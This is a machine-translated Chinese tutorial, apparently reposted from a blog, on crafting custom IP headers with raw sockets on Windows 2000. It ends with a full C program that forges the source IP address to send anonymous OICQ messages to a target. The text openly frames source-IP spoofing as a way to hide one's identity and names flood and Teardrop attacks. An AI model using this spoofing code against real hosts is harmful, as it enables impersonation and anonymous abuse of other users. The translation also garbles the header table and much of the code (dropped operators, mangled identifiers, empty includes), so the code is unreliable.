Implement your own defined IP header

zhaozj2021-02-11  156

We know that all TCP / IP network data is all transmitted on the IP packet in the IP packet, which is packaged to establish an IP datagram containing IP headers and data. In general, network software always generates IP headers with multiple 32-bit words, even if IP headers must be filled with additional 0. The IP header contains all necessary information for transmitting the package data in the IP packet. The data structure and description of the IP header are as follows:

Member length (bit) describes the version number of the version 4 IP header, is currently IPv4, the latest is the length of IPv6 Header Length 4 IP header, if there is no special choice, IP header is always 20-byte long Type of Service 8 service type, definition The length of the priority, latency, throughput, and reliability of data transmission TOTAL PACKET LENGTH 16 IP package, if there is no special option, generally 20-byte long Identification 16 IP package identifier, the host uses it unique to determine each send Data News FLAG 3 IP Data Segmentation Sign Fragment Offset 13 IP Data Segmentation Offset Time Time 8 Datashery Survival time on the network, every router, this value minus a protocol 8 TCP / IP protocol type, such as ICMP For 1, IGMP is 2, TCP is 6, UDP is 17, etc. Header Checksum 16 Header Check and Source IP Address 32 Source IP Address Destination IP Address 32 Destination IP Address Other? Other Options DATA? Data

Implementing your own defined IP head is a very meaningful thing, for example, by changing the priority and TTL of TOS in the IP head, you can make your own data package with stronger transmission capabilities and life, by modifying IP headers The source IP address can hide the IP address of your machine, and the like. The famous attack program "Teardrop" is implemented by deliberately manufacturing a slice IP package that cannot be handled by the system, and SYN FLOODER and UDP FLOODER are deceived by generating random source IP.

Third, the principle of implementation

In general, custom IP headers are implemented by using Socket's library function setsockopt () option ip_hdrincl, although it is easy to implement on UNIX and Linux platforms, but unfortunately, Winsock1.1 and Winsock2 in Windows platforms. .0 function library setsockopt () does not support IP_HDRINCL options, so in Windows 9x / NT is unable to implement IP header from the WINSOCK library, of course, can be implemented by writing a virtual device driver, but it is more complicated, but The emergence of Windows 2000 breaks this situation, and Windows2000's Winsock 2.2 library fully supports setsockopt () option ip_hdrincl so that we can easily implement custom IP headers. The implementation method is as follows:

Socket S;

Bool Bopt;

S = WSASOCKET (AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED);

Ret = setsockopt (s, ipproto_ip, ip_hdrincl, (char *) Bopt, SIZEOF (Bopt);

Fourth, instance

To help everyone learn to construct your IP header data as soon as possible, give a complete example, the functionality of the example is: Just give the other party IP address, you can send it to the other party OICQ a "Hello!" Message, and due to The IP header that sent the packet was modified, which fully implemented the sender IP address hidden, which means that you can make a complete anonymous OICQ sender, of course, if it is intentional, the consequences . The source code is as follows: / *************************************************** ********************************** /

/ * OICQSEND.C * /

/ * This program compiled with Visual C 6.0 in Windows 2000 Advanced Server debugging via * /

/ * Created by janker@371.net 2000.8.28 * /

/ * Declaration: This procedure may generate an aggressive arbitrarily modified to attack programs at your own risk * /

/ ************************************************** ********************* /

#pragma pack (1)

#define Win32_Lean_and_mean

#include #include

#include #include #include

#define OICQ_MAX_PACKET 1024 # Define OICQ_MAX_MSG 512 # define OICQ_MSG_LEN 45 # define src_ip "127.0.0.1" #define src_port 5277 # Define Dst_Port 4000

typedef struct ip_hdr {unsigned char ip_verlen; unsigned char ip_tos; unsigned short ip_totallength; unsigned short ip_id; unsigned short ip_offset; unsigned char ip_ttl; unsigned char ip_protocol; unsigned short ip_checksum; unsigned int ip_srcaddr; unsigned int ip_destaddr;} IP_HDR;

Typedef struct udp_hdr {unsigned short src_portno; unsigned short dst_portno; unsigned short udp_length; unsigned short udp_checksum;} udp_hdr;

CHAR STRMESSAGE [OICQ_MSG_LEN] = {0x02, 0x01, 0x07, 0x00, 0x78, 0x00, 0x00, 0X31, 0X30, 0X30, 0X30, 0X31, 0X1F, 0X30, 0X1F, 0X30, 0X30, 0X1F, 0X32, 0X30, 0X30, 0X3000 0x2D, ​​0x30, 0x31, 0x2D, ​​0x30, 0x31, 0x1F, 0X30, 0X30, 0X3A, 0X30, 0X30, 0X3A, 0X30, 0X30, 0X1F, 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x21, 0x03};

Ushort Checksum (Ushort * Buffer, int size) {unsigned long cksum = 0;

While (size> 1) {CKSUM = * Buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar *) buffer;} cksum = (CKSUM >> 16) (CKSUM & 0xffff); CKSUM = (CKSUM >> 16); return (~ cksum);

int main (int argc, char ** argv) {WSADATA wsd; SOCKET s; BOOL bOpt; struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; int ret; DWORD i; unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; char buf [icq_max_packet], * ptr = NULL;

Printf ("Spoof OICQ Msg Sender - by Janker@371.NET/N/N");

IF (argc! = 2) {Printf ("usage: OICQsend Destination_ip_address"); EXITPROCESS (1);

SRAND (NULL); StrMessage [5] = rand ();

IF (WSAStartup (MakeWord (2, 2), & WSD)! = 0) {Printf ("WSAStartup () FAILED:% D / N", getLastError ()); return -1;} s = WSASASOCKET (AF_INET, SOCK_RAW, Ipproto_udp, null, 0, 0); if (s == invalid_socket) {printf ("WSASOCKET () FAILED:% D / N", wsagetlasterror ()); return -1;} Bopt = true; ret = setsockopt (S , Ipproto_ip, ip_hdrincl, (char *) & bopt, sizeof (bopt)); if (RET == Socket_ERROR) {Printf ("Setsockopt (ip_hdrincl) Failed:% D / N", wsagetlasterror ()); return -1;}

ITOTALSIZE = SIZEOF (IPHDR) SIZEOF (UDPHDR) OICQ_MSG_LEN;

IIPVersion = 4; IIPSIZE = SizeOf (iPhdr) / SizeOf (unsigned long);

ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; ipHdr.ip_totallength = htons (iTotalSize); ipHdr.ip_id = 0; ipHdr.ip_offset = 0; ipHdr.ip_ttl = 128; ipHdr.ip_protocol = 0x11; iphdr.ip_checksum = 0; iphdr.ip_srcaddr = inet_addr (src_ip); iphdr.ip_destaddr = inet_addr (Argv [1]);

iUdpSize = sizeof (udpHdr) OICQ_MSG_LEN; udpHdr.src_portno = htons (SRC_PORT); udpHdr.dst_portno = htons (DST_PORT); udpHdr.udp_length = htons (iUdpSize); udpHdr.udp_checksum = 0;

Iudpchecksumsize = 0; ptr = buf; zeromeMory (buf, OICQ_MAX_PACKET);

Memcpy (PTR, & iPhdr.ip_srcaddr, sizeof (iphdr.ip_srcaddr); PTR = SIZEOF (iPhdr.ip_srcaddr); Iudpchecksumsize = SizeOf (iPhdr.ip_srcaddr);

Memcpy (PTR, & iPhdr.ip_destaddr, sizeof (iPhdr.ip_destaddr)); PTR = SIZEOF (iPhdr.ip_DestAddr); IudpChecksumsize = SizeOf (iPhdr.ip_DestAddr);

PTR ; Iudpchecksumsize = 1;

Memcpy (PTR, & iPhdr.ip_protocol, sizeof (iPhdr.ip_Protocol); PTR = SizeOf (iPhdr.ip_Protocol); Iudpchecksumsize = SizeOf (iPhdr.ip_protocol);

Memcpy (PTR, & UDPHDR.UDP_LENGTH, SIZEOF (udphdr.udp_length); PTR = SizeOf (udphdr.udp_length); Iudpchecksumsize = SizeOf (udphdr.udp_length);

Memcpy (PTR, & UDPHDR, SIZEOF (UDPHDR)); PTR = SizeOf (UDphDR); Iudpchecksumsize = SizeOf (UDphdr);

For (i = 0; i * ptr = strMessage [i]; Iudpchecksumsize = OICQ_MSG_LEN;

CKSUM = Checksum ((Ushort *) BUF, IUDPCHECKSUMSIZE); udphdr.udp_checksum = cksum;

ZeromeMory (BUF, OICQ_MAX_PACKET); PTR = BUF;

Memcpy (PTR, & IPHDR, SIZEOF (IPHDR)); PTR = SIZEOF (IPHDR); Memcpy (PTR, & UDPHDR, SIZEOF (UDphdr)); PTR = SizeOf (UDphdr); Memcpy (PTR, StrMessage, OICQ_MSG_LEN);

Remote.sin_Family = AF_INET; Remote.SIN_PORT = HTONS (DST_PORT); Remote.sin_Addr.s_addr = inet_addr (argv [1]);

RET = Sendto (S, BUF, ITATALSIZE, 0, (SockAddr *) & Remote, SizeOf (Remote)); if (RET == Socket_ERROR) Printf ("Sendto () FAILED:% D / N", wsagetlasterror ()); Else Printf ("Send OK!"); CloseSocket (s); wsacleanup (); return 0;}

转载请注明原文地址:https://www.9cbs.com/read-6085.html

New Post(0)